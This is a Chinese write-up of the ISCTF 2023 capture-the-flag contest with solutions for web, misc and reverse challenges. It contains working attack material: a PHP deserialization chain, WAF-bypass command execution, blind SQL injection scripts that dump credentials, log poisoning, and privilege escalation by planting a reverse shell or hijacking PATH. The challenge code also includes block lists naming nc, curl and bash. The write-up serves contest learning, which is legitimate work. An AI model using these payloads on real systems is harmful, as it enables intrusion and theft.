ISCTF 2023 wp

web

绕进你的心里

import requests
url="http://43.249.195.138:22515/?hongmeng[]=1&shennong[]=2&zhurong[]=1"
data={
    'pan[gu':'very'*250000+'2023ISCTF'
}
r=requests.post(url,data=data)
print(r.text)

where_is_the_flag

flag.php flag2 env

圣杯战争!!!

<?php
  highlight_file(__FILE__);
error_reporting(0);

class artifact{
  public $excalibuer;
  public $arrow;
  public function __toString(){
    echo "为Saber选择了对的武器!<br>";
    return $this->excalibuer->arrow;
  }
}

class prepare{
  public $release;
  public function __get($key){
    $functioin = $this->release;
    echo "蓄力!咖喱棒！！<br>";
    return $functioin();
  }
}
class saber{
  public $weapon;
  public function __invoke(){
    echo "胜利！<br>";
    include($this->weapon);
  }
}
class summon{
  public $Saber;
  public $Rider;

  public function __wakeup(){
    echo "开始召唤从者！<br>";
    echo $this->Saber;
  }
}

if(isset($_GET['payload'])){
  unserialize($_GET['payload']);
}
  ?>

链子：

summon::__wakeup()->artifact::__toString()->prepare::__get()->saber::__invoke()::include()

exp:

<?php
class artifact{
    public $excalibuer;
    public $arrow;
    public function __toString(){
        return $this->excalibuer->arrow;
    }
}

class prepare{
    public $release;
    public function __get($key){
        $functioin = $this->release;
        return $functioin();
    }
}
class saber{
    public $weapon;
    public function __invoke(){
        include($this->weapon);
    }
}
class summon{
    public $Saber;
    public function __wakeup(){
        echo $this->Saber;
    }
}

$a=new summon;
$b=new artifact;
$a->Saber=$b;
$c=new prepare();
$b->excalibuer=$c;
$d=new Saber;
$d->weapon='php://filter/read=convert.base64-encode/resource=flag.php';
$c->release=$d;

print_r(serialize($a));
?>
// O:6:"summon":1:{s:5:"Saber";O:8:"artifact":2:{s:10:"excalibuer";O:7:"prepare":1:{s:7:"release";O:5:"saber":1:{s:6:"weapon";s:57:"php://filter/read=convert.base64-encode/resource=flag.php";}}s:5:"arrow";N;}}

wafr

<?php
/*
Read /flaggggggg.txt
*/
error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);

if (preg_match("/cat|tac|more|less|head|tail|nl|sed|sort|uniq|rev|awk|od|vi|vim/i", $_POST['code'])) { //strings
    die("想读我文件？大胆。");
} elseif (preg_match("/\^|\||\~|\\$|\%|jay/i", $_POST['code'])) {
    die("无字母数字RCE？大胆！");
} elseif (preg_match("/bash|nc|curl|sess|\{|:|;/i", $_POST['code'])) {
    die("奇技淫巧？大胆！！");
} elseif (preg_match("/fl|ag|\.|x/i", $_POST['code'])) {
    die("大胆！！！");
} else {
    assert($_POST['code']);
}

code=print_r(`c\at /f*`)

easy_website

报错注入
注入点在username

-1'anandd(selselectect/**/extractvalue(1,concat(0x7e,database())))#      
->  users

'anandd(selselectect/**/extractvalue(1,concat(0x7e,(selselectect/**/group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where /**/table_schema=database()))))#
->  users

'anandd(selselectect/**/extractvalue(1,concat(0x7e,(selselectect/**/group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where /**/table_name=database()))))#
->user,password,USER

'anandd(selselectect/**/extractvalue(1,concat(0x7e,substr((selselectect/**/group_concat(passwoorrd)/**/from/**/users),67,98))))#
ISCTF{94e8d704-e303-4fa2-8ff

'anandd(selselectect/**/extractvalue(1,concat(0x7e,substr((selselectect/**/group_concat(passwoorrd)/**/from/**/users),95,111))))#
f-1d53192b3a22}

ISCTF{94e8d704-e303-4fa2-8fff-1d53192b3a22}

ez_ini

日志包含+.user.ini
nginx日志路径 /var/log/nginx/access.log

当前目录下有一个upload.php auto_prepend_file把木马加在这个php文件里

webinclude

逆一下index.bak里的函数

function int_array_to_string(intArr) {
  let str = '';

  for (let i = 0; i < intArr.length; i += 2) {
    const partA = intArr[i];
    const partB = intArr[i + 1];

    const charcode = (partA * 26) + partB;
    const char = String.fromCharCode(charcode);

    str += char;
  }

  return str;
}

function text_to_int_array(txt) {
  let int_array = [];

  for (let i = 0; i < txt.length; i++) {
    const charcode = txt.charCodeAt(i) - 97;
    int_array.push(charcode);
  }

  return int_array;
}
const hash = "dxdydxdudxdtdxeadxekdxea";
const flag = int_array_to_string(text_to_int_array(int_array_to_string(text_to_int_array(hash))))
console.log(flag);

#mihoyo

payload：

?mihoyo=php://filter/read=convert.base64-encode/resource=flag.php

1z_Ssql

fuzz一下
过滤了：

for
where
+
=
like
union
sleep
sys
innodb

admin' and length(database()) > 5 -- 
---> 库名长度为6

判断正确的回显好像是

You are so smart! Let me give you a hint ↓ 5aSn5L2s77yM5L2g6L+Z5LmI6IGq5piO5bqU6K+l5LiN6ZyA6KaBaGludOWQpz8=

源码里有sm4.js

base解码

6
继续盲注

import requests
url='http://43.249.195.138:22521/'
# table="-0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ_abcdefghijklmnopqrstuvwxyz"
flag=''
#for x in range(1,7):
for x in range(1,15):
    for i in range(32,127):
        data={
            #  "username":"admin' and ascii(substr(database(),{},{})) > {}  -- ".format(x,x,i),
            #version()
            "username":"admin' and ascii(substr(user(),{},{})) > {}  -- ".format(x,x,i),
            "password":"1",
            "submit":"登录"
        }
        r=requests.post(url,data=data)
        if 'You are so smart!' not in r.text:
            print(chr(i))
            flag+=chr(i)
            break
print(flag)
#bthcls
#root@localhost
#10.6.14-MariaD

接下来要爆表

ban了 information_schema.tables  
可以用sys.schema_auto_increment_columns   或者 sys.schema_table_statistics_with_buffer  或者 sys.x$schema_flattened_keys
绕过(mysql5.7+)   但是 sys也ban了
或者 mysql.innodb_table_stats  innodb也被ban了

给了两个附件，猜测一个是表名一个是列名
爆破一下

import requests
table1 = []
table2 = []
with open('./some name1.txt','r') as f1:
    line1 = f1.readlines()
    for i in line1:
        table1.append(i.strip())
with open('./some name2.txt','r') as f2:
    line2 = f2.readlines()
    for i in line2:
        table2.append(i.strip())
url = 'http://43.249.195.138:21759/'

while 1:
    for i in table1:
        for j in table2:
            payload= "admin' and ascii(substr((select group_concat({}) from bthcls.{}),1,1)) > 0 -- ".format(j,i)
            data= {
                "username":payload,
                "password":"1"
            }
            r=requests.post(url,data=data)
            if 'hint' in r.text:
                print("table",i,"columns",j)
'''
table users columns password
table users columns user
table users columns username
'''

开始盲注数据

import requests
url = 'http://43.249.195.138:21759/'
res=''
for i in range(1,100):
    low = 32
    high = 130
    mid = (high+low)//2
    while(low < high):
        payload = "admin' and ascii(substr((select group_concat(username,password) from bthcls.users),{},1)) > {} -- " .format(i,mid)
        data = {
                'username':payload,
                'password':'123'
            }
        r = requests.post(url=url,data=data)
        if 'hint' in r.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if(chr(mid) == ' '):
        break
    res  = res + chr(mid)
    print(res)

#admin  we1come7o1sctf

登录即可

fuzz!

fuzz一下 中括号[]没ban [f] 匹配f | 管道符拼接命令

<?php
  /*
Read /flaggggggg.txt
Hint: 你需要学会fuzz，看着键盘一个一个对是没有灵魂的
知识补充：curl命令也可以用来读取文件哦，如curl file:///etc/passwd
*/
  error_reporting(0);
header('Content-Type: text/html; charset=utf-8');
highlight_file(__FILE__);
$file = 'file:///etc/passwd';
if(preg_match("/\`|\~|\!|\@|\#|\\$|\%|\^|\&|\*|\(|\)|\_|\+|\=|\\\\|\'|\"|\;|\<|\>|\,|\?|jay/i", $_GET['file'])){
  die('你需要fuzz一下哦~');
}
if(!preg_match("/fi|le|flag/i", $_GET['file'])){
  $file = $_GET['file'];
}
system('curl '.$file);

?file=|cat /[f]laggggggg.txt

恐怖G7人 (赛后出）

看这个cookie能pickle.load 以为是pickle反序列化 （怒
其实是ssti
fenjing就出了

app.py

<html>
  <head>
    <title>猪王峡谷 排位赛联盟</title>
  </head>
  <body>
    <h3>了解这片土地，发现自身优势，然后纵身一跃</h3>
    <h3>芜湖~这可真带劲</h3>
    <p>-----------------------------------------------------------------------------</p>
    <h3>这场战斗并非势均力敌，有多位大厨在做饭</h3>
    <p>-----------------------------------------------------------------------------</p>
    <h1>You are the ISCTF champion,flag in /champion</h1>
    <h4>重伤倒地</h4>
    <h4>from flask import Flask
      from flask import request
      from flask import config
      from flask import session
      from flask import make_response
      from flask import render_template_string
      from waf import waf
      import base64
      import pickle

      app = Flask(__name__)

      @app.route("/")
      def Hello():
      html = '''<html>
        <head>
          <title>Welcome ISCTF</title>
        </head>
        <body>
          <h1>Hello CTFer,Welcome to ISCTF 排位赛联盟</h1>
          <br>
          <h2>了解你的撼胃者</h2>
          <img src={{url_for("static",filename="/img/1.jpg")}}>
          <h3>你知道我什么成分，来找我吧</h3>
          <br>
          <a href="/zhuwangxiagu"> 前往猪王峡谷</a>
        </body>
      </html>'''
      return render_template_string(html)

      @app.route("/zhuwangxiagu",methods=["GET","POST"])
      def pig():
      html = '''
      <html>
        <head>
          <title>猪王峡谷 排位赛联盟</title>
        </head>
        <body>
          <form action="/game" method="post" enctype="multipart/form-data">
            <p>选择你的角色</p>
            <input type="text" name="char" required>
            <input type="submit" value = "林肯死大头！">
          </form>
        </body>
      </html>
      '''
      return html

      @app.route("/game",methods=["GET","POST"])
      def game():
      name = request.form.get('char')
      # print(request.form)
      if name is None:
      name = "undefined"

      html = f'''
      <html>
        <head>
          <title>猪王峡谷 排位赛联盟</title>
        </head>
        <body>
          <h3>了解这片土地，发现自身优势，然后纵身一跃</h3>
          <h3>芜湖~这可真带劲</h3>
          <p>-----------------------------------------------------------------------------</p>
          <h3>这场战斗并非势均力敌，有多位大厨在做饭</h3>
          <p>-----------------------------------------------------------------------------</p>
          <h1>You are the ISCTF champion,flag in /champion</h1>
          <h4>重伤倒地</h4>
          <h4>{name}</h4>
          <h4>动力牛子</h4>
        </body>
      </html>
      '''
      user = base64.b64encode(pickle.dumps({"name":name,"is_champion":0}))
      resp = make_response(render_template_string(html))
      resp.set_cookie('userInfo', user)
      return resp

      @app.route("/champion")
      def getflag():
      userInfoCookies = request.cookies.get('userInfo')
      if userInfoCookies is None:
      return "<h1>Bad Request</h1>",400
      user = base64.b64decode(userInfoCookies)
      if not waf(user):
      return "<h1>403 Forbidden a</h1>",403
      user = pickle.loads(user)
      if (champion := user.get("is_champion") is None) or (username := user.get("name") is None):
      return "<h1>You are Not TruE champion</h1>",401
        if champion != 1:
                return "<h1>You are Not TruE champion</h1>",401
        else:
                return f"<h1>Welcome champion: {name},But flag in f1__A_g.txt, Get it!</h1>"

app.run(host="0.0.0.0")
</h4>
        <h4>动力牛子</h4>
        </body>
        </html>

源码一个类都没有，就为了一个cookie 就导一个pickle really逆天

misc

**ezUSB **

原汤化原食
套神工具秒套神的题



这里注意蓝牙和usb键盘流量是连着的
所以蓝牙流量最后的是大写然后usb接着又按了大写键，则后面的都为小写

AGGSZ{Kp_wn_YRV_sov_jmfyffjs!!!}
ISCTF{So_ez_USB_and_vigenere!!!} 

杰伦可是流量明星

binwalk分离出流量包
追踪http流

ISCTF{wddhr836459_83}

小蓝鲨的秘密

zip伪加密
修复宽高
得到key 15CTF2023

easy_zip

爆破纯数字

蓝鲨的福利

补png文件头

EZcrc

渊龙Sec的CRC32-Tools脚本跑出来读取zip的crc
读出来的不是按顺序的
要手动排序一下

import zlib

crc_list = [0xd2b184ff,0xb462df74,0x32973a9e,0x80a37b94,0x67ff2f5b,0xd2b184ff,0xb462df74,0x32973a9e,0x2bd745ce,0xd2b184ff,0xb462df74,0x32973a9e,0x8011b198,0xd2b184ff,0xb462df74,0x32973a9e,0xca923eba,0xd2b184ff,0xb462df74,0x32973a9e,0x671c3b57,0xd2b184ff,0xb462df74,0x32973a9e,0x2bd745ce,0xd2b184ff,0xb462df74,0x32973a9e,0x671c3b57,0xd2b184ff,0xb462df74,0x32973a9e,0xbae88946,0x8d05071e,0x44454e88,0xd2b184ff,0xb462df74,0x32973a9e,0x2bd745ce,0x5133df38,0x35a296cb,0x67ff2f5b,0x55de84d6,0xd2b184ff,0xb462df74,0x32973a9e,0xb10371d,0xd2b184ff,0xb462df74,0x32973a9e,0xb10371d,0xd2b184ff,0xb462df74,0x32973a9e,0x8d05071e,0xd2b184ff,0xb462df74,0x32973a9e,0x8d05071e,0xd2b184ff,0xb462df74,0x32973a9e,0x3d31ef42,0xd2b184ff,0xb462df74,0x32973a9e,0x80a37b94,0xef809c83,0xd2b184ff,0xb462df74,0x32973a9e,0xf1a75063,0xd2b184ff,0xb462df74,0x32973a9e,0x80a37b94,0xd2b184ff,0xb462df74,0x32973a9e,0x987a20e2,0xd2b184ff,0xb462df74,0x32973a9e,0xca923eba,0xd2b184ff,0xb462df74,0x32973a9e,0x3d31ef42,0xd2b184ff,0xb462df74,0x32973a9e,0x385b0871,0xd2b184ff,0xb462df74,0x32973a9e,0xf1a75063,0xe9c57755,0xe9c57755,0xd2b184ff,0xb462df74,0x32973a9e,0xbae88946,0xd2b184ff,0xb462df74,0x32973a9e,0x987a20e2,0x35a296cb,0xbae88946,0xd2b184ff,0xb462df74,0x32973a9e,0xffcef5e5,0xd2b184ff,0xb462df74,0x32973a9e,0x671c3b57,0x961e78b1,0x7b28dc77,0x5133df38,0xd2b184ff,0xb462df74,0x32973a9e,0xacb845e7,0x987a20e2,0xd2b184ff,0xb462df74,0x32973a9e,0xffcef5e5,0xd2b184ff,0xb462df74,0x32973a9e,0x385b0871,0xe9c57755,0xd2b184ff,0xb462df74,0x32973a9e,0x385b0871,0x55de84d6,0xd2b184ff,0xb462df74,0x32973a9e,0xb10371d,0xd2b184ff,0xb462df74,0x32973a9e,0x80a37b94,0x44454e88,0xd2b184ff,0xb462df74,0x32973a9e,0x385b0871,0x44454e88,0xd2b184ff,0xb462df74,0x32973a9e,0xf1a75063,0x8ad3bf47,0xd2b184ff,0xb462df74,0x32973a9e,0xf9cd093c,0xd2b184ff,0xb462df74,0x32973a9e,0xe71302b2,0xd2b184ff,0xb462df74,0x32973a9e,0xb10371d,0xd2b184ff,0xb462df74,0x32973a9e,0xca923eba,0xd2b184ff,0xb462df74,0x32973a9e,0x3d31ef42,0x5133df38,0x35a296cb,0xd2b184ff,0xb462df74,0x32973a9e,0x2bd745ce,0xe71302b2,0xd2b184ff,0xb462df74,0x32973a9e,0xbae88946,0xd2b184ff,0xb462df74,0x32973a9e,0xb10371d,0xd2b184ff,0xb462df74,0x32973a9e,0x8d05071e,0xd2b184ff,0xb462df74,0x32973a9e,0x8011b198,0x5133df38,0x67ff2f5b,0x3556ac70,0xd2b184ff,0xb462df74,0x32973a9e,0x80a37b94,0xd2b184ff,0xb462df74,0x32973a9e,0x2bd745ce,0x2bd745ce,0xd2b184ff,0xb462df74,0x32973a9e,0x671c3b57,0xffcef5e5,0xd2b184ff,0xb462df74,0x32973a9e,0x80a37b94,0xd2b184ff,0xb462df74,0x32973a9e,0xb10371d,0xe9c57755,0xef809c83]
for target_crc in crc_list:
    for i in range(256):
        for j in range(256):
            for k in range(256):
                data = bytes([i, j, k])  # 构造3字节数据
                crc = zlib.crc32(data) & 0xffffffff  # 计算CRC32值
                if crc == target_crc:
                    data=data.decode()
                    print(f"Found matching data: {data}")
                    break

print("Finished searching.")

对表手搓
base64decode2次

Ez_misc

key在最后一页
M13c_!ps2s23
加文件头FFD8FFE0

spalshes

做题习惯，zip先挂着爆破

设置纯数字密钥我是没想到的，但凡加几个字符都爆破不出来…感觉一堆非预期
直接做吧
base64解码后为点数据

import matplotlib.pyplot as plt

# 提供的数据
data = [
    1, 2.75, 1, 1, 2.5, 1, 1, 2.25, 1, 1, 1.75, 1, 1, 2, 1, 1, 3, 1, 1.5, 3, 1, 2, 3, 1, 2, 2.75, 1, 2, 2.5, 1, 2, 2.25, 1, 2, 2, 1, 2, 1.75, 1, 2, 1.5, 1, 1, 2.25, 1, 1.5, 2.25, 1, 1, 1.5, 1, 1.5, 1.5, 1,
    4, 2.75, 1, 4, 2.5, 1, 3, 3, 1, 3.5, 3, 1, 4, 3, 1, 3.5, 2.25, 1, 4, 2.25, 1, 4, 2, 1, 4, 1.75, 1, 4, 1.5, 1, 3, 1.5, 1, 3.5, 1.5, 1, 3, 2.25, 1, 3, 2.5, 1, 3, 2.75, 1,
    5, 3, 1, 5.5, 3, 1, 6, 3, 1, 6, 2.25, 1, 6, 2, 1, 6, 1.75, 1, 6, 1.5, 1, 5.5, 1.5, 1, 5, 1.5, 1, 5, 2.25, 1, 5.5, 2.25, 1, 5, 2.5, 1, 5, 2.75, 1,
    7, 3, 1, 7.5, 3, 1, 8, 3, 1, 8, 2.5, 1, 8, 2, 1, 8, 1.5, 1, 8, 2.75, 1, 8, 2.25, 1, 8, 1.75, 1,
    9, 3, 1, 9.5, 3, 1, 10, 3, 1, 10, 2.75, 1, 10, 2.5, 1, 10, 2.25, 1, 9.5, 2.25, 1, 9, 2.25, 1, 9, 1.5, 1, 9.5, 1.5, 1, 10, 1.5, 1, 10, 2, 1, 10, 1.75, 1,
    11.5, 3, 1, 12, 3, 1, 11, 3, 1, 12, 2.25, 1, 12, 2, 1, 12, 1.75, 1, 12, 1.5, 1, 11.5, 1.5, 1, 11, 1.5, 1, 11, 1.75, 1, 11, 2, 1, 11, 2.25, 1, 11, 2.5, 1, 11, 2.75, 1, 11.5, 2.25, 1
]

# 将数据分割成 x 和 y 坐标
x = data[::3]
y = data[1::3]

# 绘制散点图
plt.scatter(x, y)
plt.title('Scatter Plot')
plt.xlabel('X-axis')
plt.ylabel('Y-axis')
plt.show()

镜流

爆破 306256
hint 把图片缩小10倍

from PIL import Image

img = Image.open('./1new.png')
w = img.width
h = img.height
img_obj = Image.new("RGB",(w//10,h//10))

for x in range(w//10):
    for y in range(h//10):
        (r,g,b)=img.getpixel((x*10,y*10))
        img_obj.putpixel((x,y),(r,g,b))

img_obj.save('./1.png')

zsteg -e b1,rgb,lsb,xy ./1.png > flag.png

ISCTF{JINGLIU_IS_SO_COOL}

张万森,下雪了

用给的字典爆破 blueSHARK666
tip.txt 解很多层base64
词频分析 得到key ISCTFZ023
snow隐写

ISCTF{34da-a87s-sk87-s384-3982-398233}

MCSOG-猫猫

linux vim 打开可以看见只有 200c 200e 202c

stream

盲注
成功的返回包总长度是1072
手搓

PNG的基本食用

1 修改宽高
2 lsb

3 提取尾部7z
拼接 ISCTF{png-is-so-ez-for-you}

sudopy

导入了一个python库
python提权

vim /usr/lib/python3.10/webbrowser.py
加入本地弹shell的语句

sudo /usr/bin/python3 /home/ctf/web.py

其实也可以直接重写 web.py 或者直接在里面加弹shell语句

status

checkgenshin 有执行权限
丢ida

可以看到这个脚本前面设置root权限然后执行一个system命令
linux的命令是在环境变量里寻找并通过脚本文件执行的
也就是说
可以通过劫持环境变量，让这个checkgenshin 执行时在环境变量中先找到我们自己写的shell脚本，然后执行

checkgenshin执行 service ssh status 时会执行 我们写的 service

Reverse

babyRe

简单数学

import gmpy2
from Crypto.Util.number import *

a =  292884018782106151080211087047278002613718113661882871562870811030932129300110050822187903340426820507419488984883216665816506575312384940488196435920320779296487709207011656728480651848786849994095965852212548311864730225380390740637527033103610408592664948012814290769567441038868614508362013860087396409860
b= 21292789073160227295768319780997976991300923684414991432030077313041762314144710093780468352616448047534339208324518089727210764843655182515955359309813600286949887218916518346391288151954579692912105787780604137276300957046899460796651855983154616583709095921532639371311099659697834887064510351319531902433355833604752638757132129136704458119767279776712516825379722837005380965686817229771252693736534397063201880826010273930761767650438638395019411119979149337260776965247144705915951674697425506236801595477159432369862377378306461809669885764689526096087635635247658396780671976617716801660025870405374520076160
c= 5203005542361323780340103662023144468501161788183930759975924790394097999367062944602228590598053194005601497154183700604614648980958953643596732510635460233363517206803267054976506058495592964781868943617992245808463957957161100800155936109928340808755112091651619258385206684038063600864669934451439637410568700470057362554045334836098013308228518175901113235436257998397401389511926288739759268080251377782356779624616546966237213737535252748926042086203600860251557074440685879354169866206490962331203234019516485700964227924668452181975961352914304357731769081382406940750260817547299552705287482926593175925396

n = b -a -1
e =65537
phi = n -a + 1
d= gmpy2.invert(e,phi)
m = pow(c,d,n)
print(long_to_bytes(m))
#ISCTF{kisl-iopa-qdnc-tbfs-ualv}